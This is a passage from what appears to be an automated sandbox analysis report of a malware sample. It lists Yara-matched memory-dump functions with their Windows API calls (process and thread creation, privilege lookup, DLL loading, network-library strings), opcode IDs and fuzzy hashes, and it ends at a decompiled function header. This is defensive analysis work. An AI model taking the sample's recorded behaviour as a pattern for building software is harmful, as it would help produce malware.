                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
                                                                                                                          • Instruction ID: 7809820b4d748bcbf79e03d33d1142efe8ac550b43a6d02a761c8e62251b9189
                                                                                                                          • Opcode Fuzzy Hash: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
                                                                                                                          • Instruction Fuzzy Hash: EF90027220105842F20061594404B460409D7E0345F91C46AA0115655D8655E8617561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
                                                                                                                          • Instruction ID: 615b8a8342c47465eb7781b76c8f5bdc218ffda24826372951cc019352ff1973
                                                                                                                          • Opcode Fuzzy Hash: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
                                                                                                                          • Instruction Fuzzy Hash: 6F90027220105802F2807159440464A0409D7D1345FD1C469A0016655DCA55EA6977E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
                                                                                                                          • Instruction ID: 64be197c74f0823c0fa35e8d8cd17716ae694a09c8557d29eaf97282cc539f18
                                                                                                                          • Opcode Fuzzy Hash: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
                                                                                                                          • Instruction Fuzzy Hash: 1D90027220509842F24071594404A460419D7D0349F91C465A0055695D9665ED65B6A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
                                                                                                                          • Instruction ID: 47b3e3309cf49f5da4e07aa205e24e10dee13f6268ad02dfcae301c33212f093
                                                                                                                          • Opcode Fuzzy Hash: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
                                                                                                                          • Instruction Fuzzy Hash: 8590026221185042F30065694C14B070409D7D0347F91C569A0145555CC955E8716561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
                                                                                                                          • Instruction ID: b8a82f632fa56bf72cb7868dab52028a12b6c00b866e88fc85083968371cbf2d
                                                                                                                          • Opcode Fuzzy Hash: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
                                                                                                                          • Instruction Fuzzy Hash: 9490026A21305002F2807159540860A0409D7D1246FD1D869A0006559CC955E8796361
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
                                                                                                                          • Instruction ID: 023be3e3441bce2b6c47db4864c94f0b8ccdfc22a3f1e7248344157531fa3f18
                                                                                                                          • Opcode Fuzzy Hash: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
                                                                                                                          • Instruction Fuzzy Hash: 0290027231119402F210615984047060409D7D1245F91C865A0815559D86D5E8A17162
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
                                                                                                                          • Instruction ID: a83871d2278dfccabf9281bcc1d791c57444d44abaeea8f0d29d57642b5e6f32
                                                                                                                          • Opcode Fuzzy Hash: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
                                                                                                                          • Instruction Fuzzy Hash: 5B90027220105402F200659954086460409D7E0345F91D465A5015556EC6A5E8A17171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00B06F78
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                          • Opcode ID: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
                                                                                                                          • Instruction ID: 99296b7673d89471da2a5cedf4012f7148b8355e73fc3558061b4cbd94ffcc69
                                                                                                                          • Opcode Fuzzy Hash: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
                                                                                                                          • Instruction Fuzzy Hash: 943190B1601705ABD715DFA8D8A1FA7BBF8EB48700F00855DF61A9B281D730B955CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00B06F78
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                          • Opcode ID: 6223442132bb19ab46bc7626043372d3c55f5933791cd8ee891ccab1e42f70cf
                                                                                                                          • Instruction ID: 9b1c5556b9aab616113ea70a2c0c86201c8773e037279e1ce29803a6923f9fbd
                                                                                                                          • Opcode Fuzzy Hash: 6223442132bb19ab46bc7626043372d3c55f5933791cd8ee891ccab1e42f70cf
                                                                                                                          • Instruction Fuzzy Hash: 3C318FB1601205ABD715DFA8D8E1FAABFF4EB48704F148059F6199B282D770A855CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AF3B93), ref: 00B084ED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          • Opcode ID: 73fbd1f20a3120f426dad5b4f51bd0ce728e978820eefc7e018f3862a6090a7a
                                                                                                                          • Instruction ID: 8adba69238c1ab5b2931d6cd27cad9f40acfe9ed287d094e97cbcf83045c0a71
                                                                                                                          • Opcode Fuzzy Hash: 73fbd1f20a3120f426dad5b4f51bd0ce728e978820eefc7e018f3862a6090a7a
                                                                                                                          • Instruction Fuzzy Hash: FF0175712042146FD724DFA8CC89EDB7BDCDF48750F1046A9FA499B392DA31E9018BE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AF3B93), ref: 00B084ED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          • Opcode ID: 3f8a10dfcd87a26fd3541b45f6befe7aaeecffb2c57a493fc017fea1e2709753
                                                                                                                          • Instruction ID: ae260de491406586cd2df42623c97257def398a32bdd00c53cab4cbac1aeb068
                                                                                                                          • Opcode Fuzzy Hash: 3f8a10dfcd87a26fd3541b45f6befe7aaeecffb2c57a493fc017fea1e2709753
                                                                                                                          • Instruction Fuzzy Hash: ECF05EB1204204AFDB14EFADDC49DABB7ACEF84750F048599FA4997241DA31E914CAE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AF3B93), ref: 00B084ED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                          • Instruction ID: 4b45c30225c27421e3c4df008e0fdaa98ab3e722420479f97df4f0ae61bd4285
                                                                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                          • Instruction Fuzzy Hash: A4E01AB1200204ABDB14DF59CC45EA777ACAF88750F014658BA0857291CA30E9108AF0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00AF72BA
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00AF72DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                                                          • Instruction ID: e708e993df64e1bb8d0bf0a27bc04fd024f74c3038c68b060b477d53dfd770a6
                                                                                                                          • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                                                          • Instruction Fuzzy Hash: CA01A231A803287AEB20A6D49C43FFF7B6C5B00B50F144159FF04BA1C2E6A46A0686F6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00AFCF92,00AFCF92,?,00000000,?,?), ref: 00B08650
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 2367966fc863a8acf948b46aad017ba3c96056db95a4b8eae0b7cdf438f9f6f4
                                                                                                                          • Instruction ID: 6dd0acef36f7959ae9cd8d5a76384c3c9cad68dcf40f57b97522d0c694eb3cfe
                                                                                                                          • Opcode Fuzzy Hash: 2367966fc863a8acf948b46aad017ba3c96056db95a4b8eae0b7cdf438f9f6f4
                                                                                                                          • Instruction Fuzzy Hash: 7F017CB1600204BFDB14DF94CC85FEB7BA8EF44350F1145A9FA4DAB381CA35A9108BE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00AF9B82
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                          • Instruction ID: e5f237d43460bf581f28d910543d27152089f06f4a547eccd8420a740f3aac7b
                                                                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                          • Instruction Fuzzy Hash: 640112B5D4020DABDF10EBE4DC42F9EB7B89B54308F004195FA0897181F671EB14C791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00B08584
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          • Opcode ID: 62f0f447cb0d6cb040f3052d0187ba8882ba347ad09cc25d27809dcbd4ad77ad
                                                                                                                          • Instruction ID: bb97653993ece1a70c5989c066c076a8db37904e2a8eee0c1ff29de98c1ea412
                                                                                                                          • Opcode Fuzzy Hash: 62f0f447cb0d6cb040f3052d0187ba8882ba347ad09cc25d27809dcbd4ad77ad
                                                                                                                          • Instruction Fuzzy Hash: F3019DB2204108AFCB54CF99DC81EEB7BA9AF8C354F158258FA4DA7251D630E955CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00B08584
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                          • Instruction ID: a97315fb21a8e1f4d6422aebf598d4bad6586b48e79758200a084a3d73e1873f
                                                                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                          • Instruction Fuzzy Hash: C201AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251CA30E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00AFCCC0,?,?), ref: 00B0703C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          • Opcode ID: 62f04777c52798b815406677a9859fb516d651de10f545abaf60b9ec6c18e6b3
                                                                                                                          • Instruction ID: 6c88be0d327dc9bd33e63df9eb89b56a5d5b5cad42a1711ff2e89356baa3a535
                                                                                                                          • Opcode Fuzzy Hash: 62f04777c52798b815406677a9859fb516d651de10f545abaf60b9ec6c18e6b3
                                                                                                                          • Instruction Fuzzy Hash: D5E092733803043AE3306599AC03FA7B7DCCB81B20F140166FA0DEB2C1D995F80142A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00AFCCC0,?,?), ref: 00B0703C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          • Opcode ID: ef5ef866952a2587435cc1ea2851f91802d33cdcf1f736e2d43ea1b94772ba1c
                                                                                                                          • Instruction ID: 78058b3a8ebce463aa49d38dd420543a9d99c92d29b2aa065340b983de8f49a0
                                                                                                                          • Opcode Fuzzy Hash: ef5ef866952a2587435cc1ea2851f91802d33cdcf1f736e2d43ea1b94772ba1c
                                                                                                                          • Instruction Fuzzy Hash: A3F0E5323D02003AE33126588C03F977BEC8F85B10F150159F749AA1C1C9A5B54187A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00B03506,?,00B03C7F,00B03C7F,?,00B03506,?,?,?,?,?,00000000,00000000,?), ref: 00B084AD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction ID: 8f861d2417839929ff486ffab4e257493ffee16da6f5d48a9cc70e87f8bdd026
                                                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                          • Instruction Fuzzy Hash: BDE01AB1200204ABDB14DF59CC41EA777ACAF88650F114558BA085B281C930F9108AF0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00AFCF92,00AFCF92,?,00000000,?,?), ref: 00B08650
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction ID: 193a21b209262351485c4cd22487c223a15075db4f7fe6d14c69e62946ddf512
                                                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction Fuzzy Hash: 8AE01AB1200208ABDB10DF49CC85EE737ADAF88650F018164BA0857281C930E9108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00AF7C63,?), ref: 00AFD42B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                          • Instruction ID: 557c6177cf17721ea8c37566754c580366dfa59bbfe8672def4b7327cb570358
                                                                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                          • Instruction Fuzzy Hash: E2D05E657903083AE610AAA49C07F2632CD9B48B01F494064FA48972C3D960E5004171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
                                                                                                                          • Instruction ID: 19a7c12f2018f14f601814bec95284a66011731a66ca95b090792b4ac396b921
                                                                                                                          • Opcode Fuzzy Hash: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
                                                                                                                          • Instruction Fuzzy Hash: 74B09BB29014D5C5F711D76046087177D04F7D0745F56C5A5D1020645B4778E091F5B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E04B5FDDA(intOrPtr* __edx, intOrPtr _a4) {
